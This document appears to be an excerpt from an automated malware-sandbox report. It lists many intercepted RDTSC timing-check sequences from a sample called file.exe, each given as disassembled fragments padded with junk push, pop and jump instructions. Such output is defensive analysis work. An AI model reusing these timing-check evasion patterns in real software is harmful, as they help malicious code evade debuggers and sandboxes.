Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC69DB second address: BC69E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB8FCCA77B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B789F2 second address: B78A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78A0F second address: B78A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78A16 second address: B78A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB8FCD64884h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6CFB second address: BC6D07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCCA77B6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6D07 second address: BC6D33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD64883h 0x0000000d jmp 00007FB8FCD64881h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB948 second address: BCB954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB8FCCA77B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB954 second address: BCB958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB958 second address: BCB95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB95C second address: BCB977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD64883h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB977 second address: BCB97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1BA second address: BCB1C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1C0 second address: BCB1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1C9 second address: BCB1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8FCD64876h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FB8FCD64876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1DE second address: BCB1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1E2 second address: BCB1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB8FCD64876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d je 00007FB8FCD64886h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1F9 second address: BCB1FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3BE7 second address: BD3C48 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FB8FCD64883h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pushad 0x00000013 jmp 00007FB8FCD64881h 0x00000018 jg 00007FB8FCD64883h 0x0000001e jnl 00007FB8FCD6487Eh 0x00000024 pushad 0x00000025 jmp 00007FB8FCD6487Bh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1F61 second address: BD1F97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB8FCCA77C1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jne 00007FB8FCCA77B6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2548 second address: BD2561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64883h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2561 second address: BD2565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2819 second address: BD283E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jne 00007FB8FCD64876h 0x0000000f jmp 00007FB8FCD6487Bh 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 jnl 00007FB8FCD64878h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2D5C second address: BD2D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FB8FCCA77B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3030 second address: BD3046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Fh 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD38B2 second address: BD38B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD38B9 second address: BD38C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD85DC second address: BD85E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD85E3 second address: BD85ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB970 second address: BDB999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C9h 0x00000009 jne 00007FB8FCCA77B6h 0x0000000f popad 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB999 second address: BDB9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB8FCD64888h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007FB8FCD6487Ch 0x00000012 jbe 00007FB8FCD64882h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB9CC second address: BDB9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB8FCCA77B6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007FB8FCCA77B6h 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jc 00007FB8FCCA77B6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBB10 second address: BDBB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBB14 second address: BDBB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBC74 second address: BDBC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8FCD64876h 0x0000000a jmp 00007FB8FCD6487Ah 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB8FCD6487Ah 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBC9F second address: BDBCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE1E second address: BDBE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE26 second address: BDBE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE31 second address: BDBE50 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCD64887h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE50 second address: BDBE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBF98 second address: BDBF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBF9C second address: BDBFBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C9h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5E04 second address: BE5E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4A64 second address: BE4A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jp 00007FB8FCCA77B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4A72 second address: BE4A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D5D second address: BE4D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D63 second address: BE4D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD64886h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D7F second address: BE4D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FB8FCCA77B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D8E second address: BE4D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D94 second address: BE4DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3BFE second address: BE3C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE9DC7 second address: BE9DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED23D second address: BED299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64887h 0x00000007 jmp 00007FB8FCD64888h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FB8FCD64888h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB8FCD6487Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED299 second address: BED2A3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3972 second address: BF3977 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324DD second address: B324EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FB8FCCA77B6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324EA second address: B324F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324F0 second address: B32509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B32509 second address: B3250D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3250D second address: B3251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3251A second address: B3251E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA620 second address: BFA624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA624 second address: BFA63D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Bh 0x00000007 jmp 00007FB8FCD6487Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA63D second address: BFA643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA643 second address: BFA647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFEA78 second address: BFEA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE4E4 second address: BFE55C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8FCD64878h 0x00000008 pushad 0x00000009 jbe 00007FB8FCD64876h 0x0000000f jnp 00007FB8FCD64876h 0x00000015 jmp 00007FB8FCD64882h 0x0000001a je 00007FB8FCD64876h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edx 0x00000027 pop edx 0x00000028 jmp 00007FB8FCD64882h 0x0000002d jbe 00007FB8FCD64876h 0x00000033 jl 00007FB8FCD64876h 0x00000039 popad 0x0000003a jng 00007FB8FCD64892h 0x00000040 jmp 00007FB8FCD64886h 0x00000045 jnp 00007FB8FCD64876h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE6C4 second address: BFE6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01A98 second address: C01AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB8FCD64876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AA4 second address: C01ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FB8FCCA77B6h 0x0000000e jbe 00007FB8FCCA77B6h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01ABC second address: C01ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB8FCD64876h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01ACD second address: C01AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AD3 second address: C01AD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AD9 second address: C01AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FB8FCCA77BEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C015FD second address: C01612 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FB8FCD6487Bh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01612 second address: C01629 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8FCCA77BCh 0x00000008 pushad 0x00000009 jns 00007FB8FCCA77B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0178D second address: C01793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EAFD second address: C0EB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EB07 second address: C0EB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EB0C second address: C0EB32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007FB8FCCA77B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jnp 00007FB8FCCA77B6h 0x00000013 jmp 00007FB8FCCA77BFh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0E989 second address: C0E9A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB8FCD64880h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0E9A3 second address: C0E9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C100FA second address: C1010F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1010F second address: C10115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C183A1 second address: C183B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8FCD6487Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C183B5 second address: C183B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C195FD second address: C19603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C19603 second address: C19608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D1F5 second address: C1D25E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB8FCD6487Bh 0x00000008 jmp 00007FB8FCD64881h 0x0000000d pop edi 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jp 00007FB8FCD64876h 0x0000001f jmp 00007FB8FCD64887h 0x00000024 popad 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a jmp 00007FB8FCD6487Dh 0x0000002f jmp 00007FB8FCD6487Dh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C36679 second address: C3667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C37DB0 second address: C37DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB8FCD6487Bh 0x0000000b popad 0x0000000c jbe 00007FB8FCD6487Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C39762 second address: C39775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007FB8FCCA77B6h 0x0000000c popad 0x0000000d pop ebx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C4C6 second address: C3C4E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FB8FCD6487Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C03E second address: C3C04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C04C second address: C3C058 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
